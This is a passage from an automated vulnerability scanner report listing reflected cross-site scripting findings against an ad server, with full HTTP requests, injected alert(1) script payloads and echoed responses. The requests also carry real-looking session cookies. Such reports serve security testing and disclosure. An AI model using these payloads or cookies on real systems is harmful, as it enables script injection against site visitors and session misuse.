google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork/160x60088700";3040819f01d/autnwsrlsttch/ss/a/L7";
//-->
...[SNIP]...

1.48. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb6b"><script>alert(1)</script>15c7e547e2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x6008fb6b"><script>alert(1)</script>15c7e547e2/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIOO1016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2015
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:08 GMT;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x6008fb6b"><script>alert(1)</script>15c7e547e2/autnwsrlsttch/ss/a/L7&mm_flag=">
...[SNIP]...

1.49. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053e"%3be398090d692 was submitted in the REST URL parameter 7. This input was echoed as e053e";e398090d692 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/e053e"%3be398090d692/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:20 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIaO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 849
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:20 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork/160x600/e053e";e398090d692/ss/a/L7";
//-->
...[SNIP]...

1.50. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4bb6"><script>alert(1)</script>d1d8b8f699e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttcha4bb6"><script>alert(1)</script>d1d8b8f699e/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:13 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxITO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2019
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:13 GMT;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x600/autnwsrlsttcha4bb6"><script>alert(1)</script>d1d8b8f699e/ss/a/L7&mm_flag=">
...[SNIP]...

1.51. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5151"><script>alert(1)</script>05718c70aef was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ssb5151"><script>alert(1)</script>05718c70aef/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:25 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIfO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 925
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:25 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x600/autnwsrlsttch/ssb5151"><script>alert(1)</script>05718c70aef/a/L7&mm_flag=">
...[SNIP]...

1.52. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2c16"%3b16910890166 was submitted in the REST URL parameter 8. This input was echoed as f2c16";16910890166 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/f2c16"%3b16910890166/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:33 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxInO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 871
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:33 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork/160x600/autnwsrlsttch/f2c16";16910890166/a/L7";
//-->
...[SNIP]...

1.53. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad9b5"-alert(1)-"ae5167346a4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ad9b5"-alert(1)-"ae5167346a4/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:51:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011Pk0inO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1968
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 20:52:37 GMT;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
r_d.getMinutes()+"|"+-pr_d.getTimezoneOffset()/60;
var pr_postal="";
var pr_data="";
var pr_redir="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ad9b5"-alert(1)-"ae5167346a4/a/L7/1602226044/x10/USNetwork/BCN2010090393_019_HRBlock/hrblock_cc_160.html/726348573830307044726341416f7670?$CTURL$";
var pr_pos="";
var prHost=(("https:"==document.location.protocol)?"https://":"h
...[SNIP]...

1.54. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e41"><script>alert(1)</script>fd9b0b18fed was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x1071e41"><script>alert(1)</script>fd9b0b18fed HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIr; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:37 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a/1844700153/x1071e41"><script>alert(1)</script>fd9b0b18fed/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.55. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4229b"><script>alert(1)</script>e77cb2f0e34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews4229b"><script>alert(1)</script>e77cb2f0e34/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 373
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews4229b"><script>alert(1)</script>e77cb2f0e34/runofnetwork/300x250/autnwsrlsttch/ss/a/1191253499/x15/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.56. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d7c"><script>alert(1)</script>627af51db03 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork88d7c"><script>alert(1)</script>627af51db03/300x250/autnwsrlsttch/ss/a@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIIO3016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11196345589@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork88d7c"><script>alert(1)</script>627af51db03/300x250/autnwsrlsttch/ss/a/L7/1196345589/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?">
...[SNIP]...

1.57. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8098"><script>alert(1)</script>84786c535a5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250c8098"><script>alert(1)</script>84786c535a5/autnwsrlsttch/ss/a@x15 HTTP/1.1
